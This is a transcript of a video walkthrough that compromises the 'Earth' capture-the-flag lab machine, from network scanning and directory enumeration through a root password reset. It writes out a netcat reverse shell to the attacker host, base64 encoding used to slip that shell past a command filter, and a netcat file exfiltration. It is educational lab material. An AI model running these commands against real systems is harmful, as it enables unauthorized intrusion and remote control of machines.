Hi, today I'm going to show you how to break into a virtual machine called Earth. In my last video, I showed you how to break into the Mercury machine, so if you're interested, you can take a look at that one. Just like that video, my aim in this one is to show you each step of the process as well as explaining why I took those steps, and to give you a brief introduction to any tools that I use. Let's get started. Our first step is to identify the IP address of our target machine, so we're going to use the ifconfig command to display our network settings. We see that our host machine is using the IP address of 10.0.2.15 and has a default subnet mask, so our target machine will have an IP address of 10.0.2.something. To scan for all hosts on that network, we can use the nmap tool. We're going to use the command nmap space -sn space 10.0.2.1 -254. The SN option disables port scanning, and it saves us a bit of time as well as being less intrusive, and therefore less likely to be detected than a full port scan. We can see from the result of our scan that we have a default gateway of 10.0.2.1, our host machine at 10.0.2.15, and so our target machine is 10.0.2.20. Next, we're going to run a port scan on our target machine to look for possible ways into the system. To do this, we're going to use nmap again, but this time using the command nmap space -p space -A space 10.0.2.20. The P option will scan the target IP for any open ports, not just the first 1000, which is the default setting for nmap. And the A option will search for operating system, services used on each port, and their versions. We can see from the results that we have 3 ports open. Port 22, which is an SSH port, port 80, which is an HTTP port, and port 443, which is an HTTPS port. We're going to go through in order and check each of these out. Port 22 means we can connect remotely through a shell, but without any user credentials, that's not going to work. Port 80 means we might be able to access the web server through a browser, so let's try that. We find that we reach an error page. Port 443 is HTTPS, which means we need to specify our URL as https://10.0.2.20. This takes us to a Fedora web server test page. There are a couple of possible reasons for this. The most likely is that because this web server is being hosted using Apache, which can serve multiple sites using the same IP address and differentiates them using the hostname. This means that we can connect to the web server using our target IP address, but because we didn't specify a hostname, it takes us to this default test page. To fix this, we need to edit our hosts file. When you want to connect to a web service, your computer typically does this by using a DNS server to match a domain name to an IP address. The hosts file acts in much the same way, except that it happens before your computer connects to the DNS server and only affects the local machine. This means that by editing the hosts file, we can force the machine to associate a domain name with a specific IP address before it looks it up on a DNS server. This is commonly used in development or to block certain websites. To edit our hosts file, we're going to use the command sudo space nano space /etc/hosts. Sudo tells the system to run the command with root privileges. Nano is a text editor, and etc/hosts is the file we want to edit. To add an entry to our hosts file, we start a new line and enter our IP address, which is 10.0.2.20. Hit tab, then enter our domain names, which we can see from our port scanning are earth.local and teratest.earth.local. Hit Ctrl+X to exit and Y to save. If you want to, we can verify that we have changed our hosts file by using cat/etc/hosts. Now that we have our updated hosts file, we should be able to use our browser to access these domains. Let's try https://earth.local in our browser. It takes us to a web page called Earth Secure Messaging Service and includes some sort of messaging functionality with saved messages that are encrypted. If we try our other domain name, https://teratest.earth.local, we get a message saying, "Test site, please ignore." Next, I want to try directory enumeration and see if we can uncover anything useful. I used derb and ferrexbuster in my previous video, so this time I will use gobuster so you can see a different tool being used, though all three would accomplish the same task. Gobuster is another enumeration tool that could be used to scan for directories and files as well as uncover DNS subdomains. Its command line runs in the form of gobuster space mode space flags. The mode specifies the type of enumeration, such as directory or DNS. The flag option then specifies a target or word list, among others. For us, we are going to use the command gobuster space dir space -u space https://earth.local space -k space -w space /usr/share/wordlists/derb/common.txt. The dir mode tells gobuster we want to use directory enumeration mode. The u flag says we're going to target a URL, followed by that URL. The k tells gobuster to skip TLS verification. Because we're connecting to an HTTPS port, if we don't do this, then verification will fail and the scan won't work. The w tells gobuster we want to use a word list, followed by our chosen word list. We can see that gobuster has found a directory called admin, so let's check that out in our web browser. It takes us to a login page. Now, let's run gobuster again on our second domain, so the command will be gobuster space dir space -u space https://terratest.earth.local space -k space -w space and then the address of the same word list. We found a robot file, and I explained what robot files are in my previous video, so let's take a look at that. It shows us that there is another file called testing notes, which gives us a lot of information. It tells us that those encrypted messages we found earlier were encrypted using an XOR algorithm, and that their key can be found in a file called testdata.txt. It also tells us that the admin login page we found earlier can be logged into using the username Terra. A full explanation of XOR type encryption is beyond the scope of this video, but at some point in the future I might do a series on the different types of encryption. For now, we are going to decrypt these messages using Cyberchef. Use the command cyberchef to run it. If you don't have Cyberchef installed already, it will give you a prompt asking if you'd like to install it. Seeing as I do have it installed, it's going to open a new window in my browser and take me to the home screen. To make things easy, we're going to start by creating our own message in the messaging service. We will use the message, "This is a test message." For the message key, we will use the text we found in the test.data.txt file. We can see this gave us an output similar to the others, and gives us a string to decrypt with a known plain text to match against it. So back to Cyberchef. Let's put in our input our newly created encrypted string. Next, we need to tell Cyberchef what format we are using. In our case, we know this is hexadecimal just by looking at it. So under data format, find from hex and drag it over to the recipe section. Next, we need to select the type of encryption. We know from the notes file that it is XOR, so under encryption/encoding, find XOR and drag it over as well. We can then copy and paste our key from the test.data.txt file. Finally, we need to tell Cyberchef what format our key is in, so click on the drop-down icon and select UTF-8 because our key is obviously written in plaintext. Hit bake and you'll see that we have successfully decrypted the string back into our plaintext test message. This means our settings are definitely correct, so let's see what each of the other strings mean. The first two strings are unintelligible, but the third is a repeating string of Earth climate change bad for humans. Given the hint that the username for the admin page is Terra, it is possible that this string is the password, so let's try it. When we type in our new credentials, we come to a page called Admin Command Tool and what looks like a rudimentary command line interface. Let's test it using a basic command, ls. Sure enough, it behaves the way you would expect it to. However, when we try changing directory using the cd command, it doesn't let us, so we appear to have only limited functionality. We should still be able to look around though, so if we use ls space /var, we can search other directories, even if we can't change our working directory. Moving around this way, we can find the user flag in /var/earth_web, and then use the cat command to read it. So, just like in the first video I did for the Mercury machine, we have now found the user flag, but we still need to get root access. We want to start by giving ourselves a terminal to use, rather than this very basic command line interface, and to do that, we're going to use a tool called netcat. Netcat is a versatile networking tool that can be used for a wide variety of tasks, including port scanning, file transfers, and establishing network connections. Its syntax is written as nc space options space host space port. The first step is to tell our host machine to be listening out for a connection. We open up a new terminal and use the command nc space -lvnp space 4444. The L sets netcat to listen mode, in other words to accept incoming connections. The V turns on verbose mode, which means our screen will show what is happening rather than it happening in the background. N means numeric only, which turns off DNS resolution, so only IP addresses can connect. And the P lets us set a specific port. The 4444 is our chosen port. Thanks to verbose mode, we should now see that netcat is listening out on port 4444 for any incoming connections. Next, we want to go back to our rudimentary command line and use the command nc space -e space /bin/bash space 10.0.2.15 space 4444. The E is telling netcat to execute something, and in our case, that's bash. 10.0.2.15 is our host machine, and 4444 is the port that we set netcat to listen to. In other words, when we run this command on the target machine, it will attempt to connect with our host machine over port 4444, and when it's successful, open a bash terminal. Unfortunately, when we do this, we get an error saying remote connections are forbidden. This command line interface does not have permission to set up this connection. To get around this, we're going to hide our command by encrypting it with base 64. Open up a fresh terminal and use the command echo space, our netcat command from earlier in single quotes, space, pipe function, space, base 64. The echo command tells the terminal to output the result of the operation as text, and piping our string into base 64 tells it we want it encoded in base 64. This should give us some string of letters and numbers. Next, we go back to our rudimentary CLI and enter the command echo space, our ciphertext string in single quotes, space, pipe function, space, base 64, space, -d, space, pipe function again, space, bash. We are basically doing the reverse of what we just did, telling the system to decode the string with the D command and that it is in base 64, and to take the result of all of that and execute it as a bash script. It looks like not a lot is happening, but if we go back to our listening netcat that we set up earlier, we should see that it has made a connection. Now that we have a connection, let's give ourselves a proper terminal to work with. We can do this using the command python space -c space open quote import space pty semicolon pty.spawn open bracket double quote /bin/bash close double quotes close brackets close single quotes. The Python command tells the shell to interpret the next session as Python code. The C denotes that we're providing that command as a string. The command itself is importing the pty module, which is using its spawn function to import the bash terminal. We now have a properly functioning terminal, and if we hadn't been able to find the user flag earlier, we could do so now. However, we are still only a regular user and don't have root access, so that's going to be our next step. A good way to start is to search for things that we have root privileges for, even as a standard user. We can do this using the command find space / space -perm space -u equals s space -type space f space 2 greater than /dev/null. The find command does what you would expect it to and searches the system. The / tells find to start looking in the root directory. The permission u = s is specifying a search criterion. In this case, we are only interested in files in which the setUserID permission is set for the owner. All that means is that a file can be run with the permissions of the owner, regardless of who is actually running it. Type F means the search should only include regular files. Finally, the $2> dev null tells the system to suppress error messages, so we can only see searches that work and don't get a whole bunch of permission denied messages. Once we do this, we see a few different files that we have root permissions to run. Given our aim here is to get root privileges, the reset_root file looks good. We can try running it, but get an error telling us that it's missing triggers and has failed. We want to be able to investigate this a bit more, but to do so we need to send it to our host machine. We can do this by using netcat again. On our host machine, open a terminal and run the command nc -lnvp --3333 --reset_root. This tells netcat to listen on port 3333 with all the same parameters as we used before, and to redirect any data from that connection into a file called reset_root. On our target machine, we navigate to the folder we want to, which is /user/bin. Then we use the command nc /10.0.2.15 /3333 ~reset_root. This tells the system to use netcat to connect to that IP address over that port and then send the specified file. Back on our host machine, if we use the ls command, we should be able to see our reset_root file. We want to use a tool called ltrace to have a look, but first we need to modify the file slightly to put it in a format that ltrace can use. To do this, we're going to use the command chmod +x /reset_root. chmod stands for change mode and is used to change permissions of a file or directory. +x adds execute permissions to the file. In other words, it makes the file executable. // is the current directory, and reset_root is the file we want to modify. Once we've done that, we can use ltrace. Ltrace is a debugging program and can be run using the command ltrace /reset_root. Let's take a look at the output from ltrace. First, we see the lines we saw when we first tried to run it on our target machine, checking to see if all triggers are present. Then we have 3 lines with access, a file path, a 0, then equals -1. Access means the system is checking the availability of the file. The file path is the file it's looking for, and the 0 means it's only checking for the existence of the file, not any specific permissions. The equals -1 means an error has occurred. In other words, those 3 files are missing and therefore the script has failed. So, let's create those files and see what happens. We can do this with the touch command. The touch command is used to create empty files and to modify timestamps of a file. It uses the syntax touch options file name. In our bash terminal of our target machine, we will use the touch command to create our 3 missing files. We use touch and then just copy the file paths from ltrace. Let's do this for each file. Now, let's try running the reset_root script again. We can see that the root password has been reset to earth. Let's change to root user by using the command su and then entering the password earth. We now have root access. Navigate to the root directory with cd /root. Use ls to list files and then cat to read the root flag text file. And there you have it. We have completed the earth machine. So, in summary, we searched our network for the target machine, conducted a port scan, used directory enumeration, decrypted some user credentials, used netcat to give ourselves a terminal, searched for any files which we could run with root permissions, and used ltrace to debug the script so we could run it and reset the root password. Once again, I hope you found this video useful, and good luck with your future hacking exploits.